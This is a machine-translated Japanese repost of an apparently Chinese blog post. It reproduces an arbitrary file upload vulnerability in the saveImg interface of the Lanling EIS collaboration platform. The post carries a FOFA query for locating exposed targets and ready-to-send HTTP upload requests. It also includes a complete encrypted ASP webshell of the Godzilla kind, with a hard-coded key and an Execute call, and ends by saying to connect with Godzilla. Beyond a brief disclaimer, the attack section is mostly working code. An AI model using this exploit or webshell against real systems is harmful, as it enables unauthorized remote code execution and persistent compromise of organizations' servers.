Lanling EIS スマート コラボレーション プラットフォームの saveImg インターフェイスに任意のファイル アップロードの脆弱性があります

Lanling EIS スマート コラボレーション プラットフォームの saveImg インターフェイスに任意のファイル アップロードの脆弱性があります

免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供されている情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身の責任となります。被った結果 悪影響は記事の著者とは何の関係もありません。この記事は教育のみを目的としています。

1.蘭陵EISの概要

Lanling スマート コラボレーション プラットフォーム eis は、知識、コラボレーション、プロジェクト管理システム構築などにおける組織や企業のニーズを満たす非常に豊富なモジュールを統合しています。

2. 脆弱性の説明

Lanling インテリジェント コラボレーション プラットフォーム EIS は、知識、コラボレーション、プロジェクト管理システム構築などの組織や企業のニーズを満たす非常に豊富なモジュールを統合しています。プラットフォームの saveImg インターフェイスに任意のファイルをアップロードする脆弱性があり、それを介して weshell がアップロードされる可能性があります。

3. 影響を受けるバージョン

Lanling インテリジェント コラボレーション プラットフォーム EIS
ここに画像の説明を挿入します

4. fofaクエリステートメント

icon_hash=“953405444”

5. 脆弱性の再発

脆弱性リンク: http://127.0.0.1/eis/service/api.aspx?action=saveImg

脆弱性パケット:

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Length: 179
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

578321995
--25c172e79b2758a7d7ff9fe9cab4a76d--

脆弱性データ パケットを送信すると、アップロードされたパスが返されます。

ここに画像の説明を挿入します

結合されたアップロードされたファイルのパス: http://127.0.0.1/files/editor_img/20231019212439970030/20231019212439970030.asp

ここに画像の説明を挿入します
ゲップパッケージ

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
Content-Length: 1950

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

<%
Set bypassDictionary = Server.CreateObject("Scripting.Dictionary")

Function Base64Decode(ByVal vCode)
    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = oNode.nodeTypedValue
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Function decryption(content,isBin)
    dim size,i,result,keySize
    keySize = len(key)
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.CharSet = "iso-8859-1"
    BinaryStream.Type = 2
    BinaryStream.Open
    if IsArray(content) then
        size=UBound(content)+1
        For i=1 To size
            BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1)))
        Next
    end if
    BinaryStream.Position = 0
    if isBin then
        BinaryStream.Type = 1
        decryption=BinaryStream.Read()
    else
        decryption=BinaryStream.ReadText()
    end if

End Function
    key="3c6e0b8a9c15224a"
    content=request.Form("123456")
    if not IsEmpty(content) then

        if  IsEmpty(Session("payload")) then
            content=decryption(Base64Decode(content),false)
            Session("payload")=content
            response.End
        else
            content=decryption(Base64Decode(content),true)
            bypassDictionary.Add "payload",Session("payload")
            Execute(bypassDictionary("payload"))
            result=run(content)
            response.Write("ca0be7")
            if not IsEmpty(result) then
                response.Write Base64Encode(decryption(result,true))
            end if
            response.Write("2d6353")
        end if
    end if
%>
--25c172e79b2758a7d7ff9fe9cab4a76d--

6. 深い再発

1. 花のように贈る

ここに画像の説明を挿入します

2.ゴジラ直結

ここに画像の説明を挿入します

おすすめ

転載: blog.csdn.net/holyxp/article/details/134117897